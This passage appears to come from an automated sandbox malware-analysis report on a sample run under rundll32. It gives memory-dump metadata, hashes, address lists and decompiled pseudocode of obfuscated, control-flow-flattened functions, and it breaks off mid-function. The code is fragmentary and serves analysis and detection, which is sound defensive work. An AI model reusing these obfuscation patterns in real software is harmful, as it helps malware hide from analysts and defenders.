                                                                                                                                  0x002d49ee
                                                                                                                                  0x002d49fb
                                                                                                                                  0x002d4a03
                                                                                                                                  0x002d4a0b
                                                                                                                                  0x002d4a13
                                                                                                                                  0x002d4a1b
                                                                                                                                  0x002d4a23
                                                                                                                                  0x002d4a2f
                                                                                                                                  0x002d4a37
                                                                                                                                  0x002d4a3b
                                                                                                                                  0x002d4a43
                                                                                                                                  0x002d4a4b
                                                                                                                                  0x002d4a53
                                                                                                                                  0x002d4a5b
                                                                                                                                  0x002d4a63
                                                                                                                                  0x002d4a6b
                                                                                                                                  0x002d4a73
                                                                                                                                  0x002d4a7b
                                                                                                                                  0x002d4a83
                                                                                                                                  0x002d4a83
                                                                                                                                  0x002d4a8d
                                                                                                                                  0x002d4ac9
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4a8f
                                                                                                                                  0x002d4a91
                                                                                                                                  0x002d4b4f
                                                                                                                                  0x002d4a97
                                                                                                                                  0x002d4a9d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4a9f
                                                                                                                                  0x002d4aaf
                                                                                                                                  0x002d4ab0
                                                                                                                                  0x002d4ab9
                                                                                                                                  0x002d4abf
                                                                                                                                  0x002d4ac5
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4ac5
                                                                                                                                  0x002d4abf
                                                                                                                                  0x002d4a9d
                                                                                                                                  0x002d4a91
                                                                                                                                  0x002d4b58
                                                                                                                                  0x002d4b60
                                                                                                                                  0x002d4b60
                                                                                                                                  0x002d4afa
                                                                                                                                  0x002d4aff
                                                                                                                                  0x002d4b04
                                                                                                                                  0x002d4b10
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4b06
                                                                                                                                  0x002d4b06
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4b06
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4b15
                                                                                                                                  0x002d4b15
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -e$62$?M'$h\c$z
                                                                                                                                  • API String ID: 0-1842174784
                                                                                                                                  • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                  • Instruction ID: 2560b91f70d938e14ca642d8ff335d59e85f967c75194757c10679554ca118af
                                                                                                                                  • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                  • Instruction Fuzzy Hash: FA812E715193819FD3A8CF62C58991FBBF1FBD9758F408A0DF29586260D3B6CA188F42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EBE27 Relevance: 6.4, Strings: 5, Instructions: 130COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002EBE27(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v320;
				char _t133;
				signed int _t136;
				void* _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				char* _t144;
				intOrPtr* _t163;
				void* _t164;

				_v40 = 0x365269;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00099806;
				_v16 = 0x620947;
				_v16 = _v16 + 0x25da;
				_v16 = _v16 | 0xf0dff1a3;
				_v16 = _v16 + 0xffff8fd5;
				_v16 = _v16 ^ 0xf0f65193;
				_v60 = 0x4a6911;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0015bfec;
				_v32 = 0xee641f;
				_v32 = _v32 ^ 0x54466854;
				_v32 = _v32 ^ 0x51df3278;
				_v32 = _v32 ^ 0x057124b2;
				_v36 = 0x2245a1;
				_t163 = __ecx;
				_t141 = 0x59;
				_v36 = _v36 / _t141;
				_t142 = 0x7c;
				_v36 = _v36 / _t142;
				_v36 = _v36 ^ 0x00022b59;
				_v52 = 0x17e728;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x0bfefc33;
				_v24 = 0x5a7c12;
				_v24 = _v24 + 0xffff6a30;
				_v24 = _v24 + 0xb9bd;
				_v24 = _v24 ^ 0x00522d4c;
				_v8 = 0x70b293;
				_v8 = _v8 ^ 0xb7f64013;
				_v8 = _v8 | 0x98950303;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0xf38d6f21;
				_v28 = 0x5e48e6;
				_v28 = _v28 >> 2;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xc917f664;
				_v44 = 0xd34be4;
				_v44 = _v44 ^ 0x1af04c78;
				_v44 = _v44 ^ 0x1a25cf5b;
				_v56 = 0x13a2c8;
				_v56 = _v56 ^ 0x00107e6c;
				_v20 = 0x6acc1;
				_t143 = 0x48;
				_v20 = _v20 * 0x75;
				_v20 = _v20 | 0x5ce04716;
				_v20 = _v20 ^ 0xfe39b07b;
				_v20 = _v20 ^ 0xa1d6ae77;
				_v48 = 0x9d30cb;
				_t144 =  &_v320;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x00028c5d;
				_v12 = 0x456efe;
				_v12 = _v12 + 0xffff4082;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0xdbb5e427;
				_v12 = _v12 ^ 0xdb99f5c8;
				while(1) {
					_t133 =  *_t163;
					if(_t133 == 0) {
						break;
					}
					if(_t133 == 0x2e) {
						 *_t144 = 0;
					} else {
						 *_t144 = _t133;
						_t144 = _t144 + 1;
						_t163 = _t163 + 1;
						continue;
					}
					L6:
					_t164 = E002DADE6(_v40, _v16,  &_v320, _v60);
					if(_t164 != 0) {
						L8:
						_t136 = E002EDBEA(_t163 + 1, _v8, _v28, _v44);
						_push(_v12);
						_push(_t136 ^ 0x2ac2611c);
						_push(_v48);
						_push(_t164);
						return E002DCDCD(_v56, _v20);
					}
					_t139 = E002ECADF(_v32,  &_v320, _v36, _v52);
					_t164 = _t139;
					if(_t164 != 0) {
						goto L8;
					}
					return _t139;
				}
				goto L6;
			}



























                                                                                                                                  0x002ebe30
                                                                                                                                  0x002ebe39
                                                                                                                                  0x002ebe3d
                                                                                                                                  0x002ebe44
                                                                                                                                  0x002ebe4b
                                                                                                                                  0x002ebe52
                                                                                                                                  0x002ebe59
                                                                                                                                  0x002ebe60
                                                                                                                                  0x002ebe67
                                                                                                                                  0x002ebe6e
                                                                                                                                  0x002ebe72
                                                                                                                                  0x002ebe79
                                                                                                                                  0x002ebe80
                                                                                                                                  0x002ebe87
                                                                                                                                  0x002ebe8e
                                                                                                                                  0x002ebe95
                                                                                                                                  0x002ebea3
                                                                                                                                  0x002ebea5
                                                                                                                                  0x002ebeaa
                                                                                                                                  0x002ebeb2
                                                                                                                                  0x002ebeb7
                                                                                                                                  0x002ebebc
                                                                                                                                  0x002ebec3
                                                                                                                                  0x002ebeca
                                                                                                                                  0x002ebece
                                                                                                                                  0x002ebed5
                                                                                                                                  0x002ebedc
                                                                                                                                  0x002ebee3
                                                                                                                                  0x002ebeea
                                                                                                                                  0x002ebef1
                                                                                                                                  0x002ebef8
                                                                                                                                  0x002ebeff
                                                                                                                                  0x002ebf06
                                                                                                                                  0x002ebf0a
                                                                                                                                  0x002ebf11
                                                                                                                                  0x002ebf18
                                                                                                                                  0x002ebf1c
                                                                                                                                  0x002ebf20
                                                                                                                                  0x002ebf27
                                                                                                                                  0x002ebf2e
                                                                                                                                  0x002ebf35
                                                                                                                                  0x002ebf3c
                                                                                                                                  0x002ebf49
                                                                                                                                  0x002ebf50
                                                                                                                                  0x002ebf5b
                                                                                                                                  0x002ebf5c
                                                                                                                                  0x002ebf5f
                                                                                                                                  0x002ebf66
                                                                                                                                  0x002ebf6d
                                                                                                                                  0x002ebf74
                                                                                                                                  0x002ebf80
                                                                                                                                  0x002ebf86
                                                                                                                                  0x002ebf89
                                                                                                                                  0x002ebf90
                                                                                                                                  0x002ebf97
                                                                                                                                  0x002ebf9e
                                                                                                                                  0x002ebfa1
                                                                                                                                  0x002ebfa8
                                                                                                                                  0x002ebfb9
                                                                                                                                  0x002ebfb9
                                                                                                                                  0x002ebfbd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebfb3
                                                                                                                                  0x002ebfc1
                                                                                                                                  0x002ebfb5
                                                                                                                                  0x002ebfb5
                                                                                                                                  0x002ebfb7
                                                                                                                                  0x002ebfb8
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebfb8
                                                                                                                                  0x002ebfc4
                                                                                                                                  0x002ebfd9
                                                                                                                                  0x002ebfdf
                                                                                                                                  0x002ebffd
                                                                                                                                  0x002ec00c
                                                                                                                                  0x002ec011
                                                                                                                                  0x002ec019
                                                                                                                                  0x002ec01a
                                                                                                                                  0x002ec023
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec029
                                                                                                                                  0x002ebff0
                                                                                                                                  0x002ebff5
                                                                                                                                  0x002ebffb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec031
                                                                                                                                  0x002ec031
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                                  • API String ID: 0-1567385930
                                                                                                                                  • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                  • Instruction ID: 23b70687a386311adc0fab89ca4e7dee4a716cc1fde9f5d3ab21fde61df6a099
                                                                                                                                  • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                  • Instruction Fuzzy Hash: F7513271C05219EBDF09CFA5D94A8EEFBB1FF09318F208159E411BA260C7B51A56CF94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                                  • SendMessageA.USER32 ref: 1001B48B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$LongMessageSendWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1063413437-0
                                                                                                                                  • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                  • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                                  • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                  • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E20BA Relevance: 5.2, Strings: 4, Instructions: 240COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E002E20BA() {
				char _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t227;
				intOrPtr _t228;
				signed int _t230;
				void* _t231;
				intOrPtr _t235;
				intOrPtr _t245;
				void* _t247;
				intOrPtr _t254;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t277;
				signed int* _t279;
				void* _t283;

				_t279 =  &_v624;
				_v612 = 0x15bebb;
				_v612 = _v612 ^ 0x0c09d82a;
				_t247 = 0x7e01d7;
				_v612 = _v612 + 0xffff69e9;
				_v612 = _v612 ^ 0xcffb1e8d;
				_v612 = _v612 ^ 0xc3e0ceeb;
				_v596 = 0xb5bc7f;
				_v596 = _v596 << 0xa;
				_v596 = _v596 + 0xbaa7;
				_v596 = _v596 ^ 0xd6f2b68e;
				_v600 = 0x5909af;
				_v600 = _v600 ^ 0x0096463d;
				_v600 = _v600 >> 3;
				_v600 = _v600 ^ 0x0016e9cd;
				_v548 = 0x801d18;
				_v548 = _v548 + 0xffffc800;
				_v548 = _v548 ^ 0x0070ca5a;
				_v580 = 0x2361dd;
				_v580 = _v580 * 0x6f;
				_t277 = 0;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0xdbb34e1e;
				_v528 = 0x864281;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0000b217;
				_v560 = 0x478502;
				_v560 = _v560 | 0x3d47d1eb;
				_v560 = _v560 ^ 0x3d4c1a49;
				_v540 = 0x8f961f;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000d133d;
				_v572 = 0xef4b2;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff85b1;
				_v572 = _v572 ^ 0xde949f86;
				_v608 = 0x8e969a;
				_v608 = _v608 << 0xd;
				_t272 = 0x21;
				_v608 = _v608 / _t272;
				_t273 = 0x2f;
				_v608 = _v608 / _t273;
				_v608 = _v608 ^ 0x002a10b8;
				_v620 = 0x864bbd;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0x87ba;
				_v620 = _v620 + 0x936f;
				_v620 = _v620 ^ 0x4bb78bcc;
				_v564 = 0xfb8a17;
				_t274 = 0x62;
				_v564 = _v564 * 0x63;
				_v564 = _v564 ^ 0x61429d97;
				_v576 = 0x222f;
				_v576 = _v576 >> 4;
				_v576 = _v576 ^ 0xf39884cf;
				_v576 = _v576 ^ 0xf39d4647;
				_v556 = 0x6068cb;
				_v556 = _v556 ^ 0xfe1a734d;
				_v556 = _v556 ^ 0xfe79d9b4;
				_v616 = 0xc46e23;
				_v616 = _v616 >> 2;
				_v616 = _v616 / _t274;
				_v616 = _v616 * 0x76;
				_v616 = _v616 ^ 0x003e2a5a;
				_v624 = 0x4617e4;
				_v624 = _v624 + 0xffff4d74;
				_v624 = _v624 ^ 0x9dcdfd87;
				_v624 = _v624 + 0x3fd8;
				_v624 = _v624 ^ 0x9d89a5c2;
				_v588 = 0x3a0167;
				_v588 = _v588 << 1;
				_v588 = _v588 + 0xffff1a51;
				_v588 = _v588 ^ 0x00728a40;
				_v532 = 0x3a363e;
				_v532 = _v532 ^ 0xe52a74a2;
				_v532 = _v532 ^ 0xe514694b;
				_v544 = 0x52d5cb;
				_v544 = _v544 | 0x185d0a08;
				_v544 = _v544 ^ 0x18524fe5;
				_v584 = 0x37b3aa;
				_v584 = _v584 + 0xebef;
				_t275 = 0x72;
				_v584 = _v584 * 0x28;
				_v584 = _v584 ^ 0x08d0b087;
				_v592 = 0xa4bebe;
				_v592 = _v592 >> 8;
				_v592 = _v592 | 0x739fbd45;
				_v592 = _v592 ^ 0x739593e3;
				_v552 = 0x17b1c;
				_v552 = _v552 << 0xe;
				_v552 = _v552 ^ 0x5ecd7403;
				_v568 = 0x403d75;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0x80b15bc0;
				_v568 = _v568 ^ 0x80b9a416;
				_v536 = 0x2ed64e;
				_t276 = _v524;
				_v536 = _v536 / _t275;
				_v536 = _v536 ^ 0x00033d67;
				_v604 = 0x8b403d;
				_v604 = _v604 + 0xffff3866;
				_v604 = _v604 << 8;
				_v604 = _v604 ^ 0x8a7a6cd3;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t247 - 0x73dad95;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E002EDA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
							_t235 = E002D2051(_v536,  &_v520, _v604);
							_t254 =  *0x2f3e10; // 0x0
							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
						} else {
							if(_t247 == 0x7e01d7) {
								_push(_t247);
								_push(_t247);
								 *0x2f3e10 = E002D7FF2(0x45c);
								_t247 = 0x8643fcd;
								continue;
							} else {
								if(_t247 == 0xd34913) {
									_t247 = 0x148c4fa;
									_v524 = _v596;
									continue;
								} else {
									if(_t247 == 0xfeb697) {
										_v524 = _v612;
										goto L8;
									} else {
										if(_t247 != 0x148c4fa) {
											goto L20;
										} else {
											E002E8F9E(_v620, _v564, _v576, _v556, _t276);
											_t279 =  &(_t279[3]);
											L8:
											_t247 = 0xac90332;
											continue;
										}
									}
								}
							}
						}
						L23:
						return _t277;
					}
					__eflags = _t247 - 0x8643fcd;
					if(_t247 == 0x8643fcd) {
						_t227 = E002D912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
						_t276 = _t227;
						_t279 =  &(_t279[5]);
						__eflags = _t227;
						if(__eflags == 0) {
							_t247 = 0xfeb697;
							goto L20;
						} else {
							_t245 =  *0x2f3e10; // 0x0
							 *((intOrPtr*)(_t245 + 0x450)) = 1;
							_t247 = 0xd34913;
							goto L1;
						}
					} else {
						__eflags = _t247 - 0xac90332;
						if(_t247 == 0xac90332) {
							_push(_v532);
							_push(_v524);
							_push(_v588);
							_t228 =  *0x2f3e10; // 0x0
							_push(_t228 + 0x23c);
							_t230 = E002E46BB(_v616, _v624);
							_t279 = _t279 - 0xc + 0x1c;
							_t247 = 0xe2d9513;
							__eflags = _t230;
							_t231 = 1;
							_t277 =  ==  ? _t231 : _t277;
							goto L1;
						} else {
							__eflags = _t247 - 0xe2d9513;
							if(_t247 != 0xe2d9513) {
								goto L20;
							} else {
								E002DA55F();
								_t247 = 0x73dad95;
								goto L1;
							}
						}
					}
					goto L23;
					L20:
					__eflags = _t247 - 0x13a2d4a;
				} while (__eflags != 0);
				goto L23;
			}













































                                                                                                                                  0x002e20ba
                                                                                                                                  0x002e20c0
                                                                                                                                  0x002e20ca
                                                                                                                                  0x002e20d2
                                                                                                                                  0x002e20d7
                                                                                                                                  0x002e20df
                                                                                                                                  0x002e20e7
                                                                                                                                  0x002e20ef
                                                                                                                                  0x002e20f7
                                                                                                                                  0x002e20fc
                                                                                                                                  0x002e2104
                                                                                                                                  0x002e210c
                                                                                                                                  0x002e2114
                                                                                                                                  0x002e211c
                                                                                                                                  0x002e2121
                                                                                                                                  0x002e2129
                                                                                                                                  0x002e2131
                                                                                                                                  0x002e2139
                                                                                                                                  0x002e2141
                                                                                                                                  0x002e2152
                                                                                                                                  0x002e2156
                                                                                                                                  0x002e2158
                                                                                                                                  0x002e215d
                                                                                                                                  0x002e2165
                                                                                                                                  0x002e216d
                                                                                                                                  0x002e2172
                                                                                                                                  0x002e217a
                                                                                                                                  0x002e2182
                                                                                                                                  0x002e218a
                                                                                                                                  0x002e2192
                                                                                                                                  0x002e219a
                                                                                                                                  0x002e219f
                                                                                                                                  0x002e21a7
                                                                                                                                  0x002e21af
                                                                                                                                  0x002e21b4
                                                                                                                                  0x002e21bc
                                                                                                                                  0x002e21c4
                                                                                                                                  0x002e21cc
                                                                                                                                  0x002e21d7
                                                                                                                                  0x002e21dc
                                                                                                                                  0x002e21e6
                                                                                                                                  0x002e21eb
                                                                                                                                  0x002e21f1
                                                                                                                                  0x002e21f9
                                                                                                                                  0x002e2201
                                                                                                                                  0x002e2206
                                                                                                                                  0x002e220e
                                                                                                                                  0x002e2216
                                                                                                                                  0x002e221e
                                                                                                                                  0x002e222b
                                                                                                                                  0x002e222c
                                                                                                                                  0x002e2230
                                                                                                                                  0x002e2238
                                                                                                                                  0x002e2240
                                                                                                                                  0x002e2245
                                                                                                                                  0x002e224d
                                                                                                                                  0x002e2255
                                                                                                                                  0x002e225d
                                                                                                                                  0x002e2265
                                                                                                                                  0x002e226d
                                                                                                                                  0x002e2275
                                                                                                                                  0x002e2280
                                                                                                                                  0x002e2289
                                                                                                                                  0x002e228d
                                                                                                                                  0x002e2297
                                                                                                                                  0x002e22a4
                                                                                                                                  0x002e22b1
                                                                                                                                  0x002e22b9
                                                                                                                                  0x002e22c1
                                                                                                                                  0x002e22c9
                                                                                                                                  0x002e22d1
                                                                                                                                  0x002e22d5
                                                                                                                                  0x002e22dd
                                                                                                                                  0x002e22e5
                                                                                                                                  0x002e22ed
                                                                                                                                  0x002e22f5
                                                                                                                                  0x002e22fd
                                                                                                                                  0x002e2305
                                                                                                                                  0x002e230d
                                                                                                                                  0x002e2315
                                                                                                                                  0x002e231d
                                                                                                                                  0x002e232c
                                                                                                                                  0x002e232d
                                                                                                                                  0x002e2331
                                                                                                                                  0x002e2339
                                                                                                                                  0x002e2341
                                                                                                                                  0x002e2346
                                                                                                                                  0x002e234e
                                                                                                                                  0x002e2356
                                                                                                                                  0x002e235e
                                                                                                                                  0x002e2363
                                                                                                                                  0x002e236b
                                                                                                                                  0x002e2373
                                                                                                                                  0x002e2378
                                                                                                                                  0x002e2380
                                                                                                                                  0x002e2388
                                                                                                                                  0x002e2396
                                                                                                                                  0x002e239a
                                                                                                                                  0x002e239e
                                                                                                                                  0x002e23a6
                                                                                                                                  0x002e23ae
                                                                                                                                  0x002e23b6
                                                                                                                                  0x002e23bb
                                                                                                                                  0x002e23bb
                                                                                                                                  0x002e23c3
                                                                                                                                  0x002e23c3
                                                                                                                                  0x002e23c3
                                                                                                                                  0x002e23c3
                                                                                                                                  0x002e23c5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23cb
                                                                                                                                  0x002e2519
                                                                                                                                  0x002e2532
                                                                                                                                  0x002e2537
                                                                                                                                  0x002e2540
                                                                                                                                  0x002e23d1
                                                                                                                                  0x002e23d7
                                                                                                                                  0x002e243c
                                                                                                                                  0x002e243d
                                                                                                                                  0x002e2445
                                                                                                                                  0x002e244a
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23d9
                                                                                                                                  0x002e23df
                                                                                                                                  0x002e2420
                                                                                                                                  0x002e2425
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23e1
                                                                                                                                  0x002e23e7
                                                                                                                                  0x002e2416
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23e9
                                                                                                                                  0x002e23ef
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23f5
                                                                                                                                  0x002e2406
                                                                                                                                  0x002e240b
                                                                                                                                  0x002e240e
                                                                                                                                  0x002e240e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e240e
                                                                                                                                  0x002e23ef
                                                                                                                                  0x002e23e7
                                                                                                                                  0x002e23df
                                                                                                                                  0x002e23d7
                                                                                                                                  0x002e2544
                                                                                                                                  0x002e254f
                                                                                                                                  0x002e254f
                                                                                                                                  0x002e2454
                                                                                                                                  0x002e245a
                                                                                                                                  0x002e24ca
                                                                                                                                  0x002e24cf
                                                                                                                                  0x002e24d1
                                                                                                                                  0x002e24d4
                                                                                                                                  0x002e24d6
                                                                                                                                  0x002e24f0
                                                                                                                                  0x00000000
                                                                                                                                  0x002e24d8
                                                                                                                                  0x002e24d8
                                                                                                                                  0x002e24e0
                                                                                                                                  0x002e24e6
                                                                                                                                  0x00000000
                                                                                                                                  0x002e24e6
                                                                                                                                  0x002e245c
                                                                                                                                  0x002e245c
                                                                                                                                  0x002e245e
                                                                                                                                  0x002e2478
                                                                                                                                  0x002e247c
                                                                                                                                  0x002e2480
                                                                                                                                  0x002e2484
                                                                                                                                  0x002e2499
                                                                                                                                  0x002e249a
                                                                                                                                  0x002e249f
                                                                                                                                  0x002e24a2
                                                                                                                                  0x002e24a7
                                                                                                                                  0x002e24ab
                                                                                                                                  0x002e24ac
                                                                                                                                  0x00000000
                                                                                                                                  0x002e2460
                                                                                                                                  0x002e2460
                                                                                                                                  0x002e2466
                                                                                                                                  0x00000000
                                                                                                                                  0x002e246c
                                                                                                                                  0x002e246c
                                                                                                                                  0x002e2471
                                                                                                                                  0x00000000
                                                                                                                                  0x002e2471
                                                                                                                                  0x002e2466
                                                                                                                                  0x002e245e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e24f5
                                                                                                                                  0x002e24f5
                                                                                                                                  0x002e24f5
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: /"$>6:$Z*>$u=@
                                                                                                                                  • API String ID: 0-89199335
                                                                                                                                  • Opcode ID: a3dbeb2bf2b856028129616b4dc6feca115964a0e0e0e3bd6881fade5d927f89
                                                                                                                                  • Instruction ID: c1250a51a8190f73bb60a24147a31a4b51ce120f0f73f76ebf40cfc915a1bb2f
                                                                                                                                  • Opcode Fuzzy Hash: a3dbeb2bf2b856028129616b4dc6feca115964a0e0e0e3bd6881fade5d927f89
                                                                                                                                  • Instruction Fuzzy Hash: ACB12171118381DFC358CF26C48A81BFBE5FBC4748F60991DF6A286261D3B58959CF52
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D5548 Relevance: 5.2, Strings: 4, Instructions: 233COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D5548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v24;
				char _v28;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* __ecx;
				void* _t190;
				void* _t206;
				void* _t208;
				signed int _t209;
				char* _t211;
				signed int _t212;
				intOrPtr _t222;
				intOrPtr* _t225;
				void* _t227;
				char* _t229;
				char _t233;
				intOrPtr _t255;
				intOrPtr* _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int* _t263;

				_t225 = _a16;
				_t257 = _a4;
				_push(_t225);
				_push(_a12);
				_push(_a8);
				_push(_t257);
				_push(__edx);
				E002E20B9(_t190);
				_v56 = 0xb9e7cb;
				_t255 = 0;
				_v52 = 0x6e87b5;
				_t263 =  &(( &_v148)[6]);
				_v48 = 0;
				_v44 = 0;
				_t227 = 0x3ccc1e9;
				_v128 = 0x85629b;
				_t258 = 0x62;
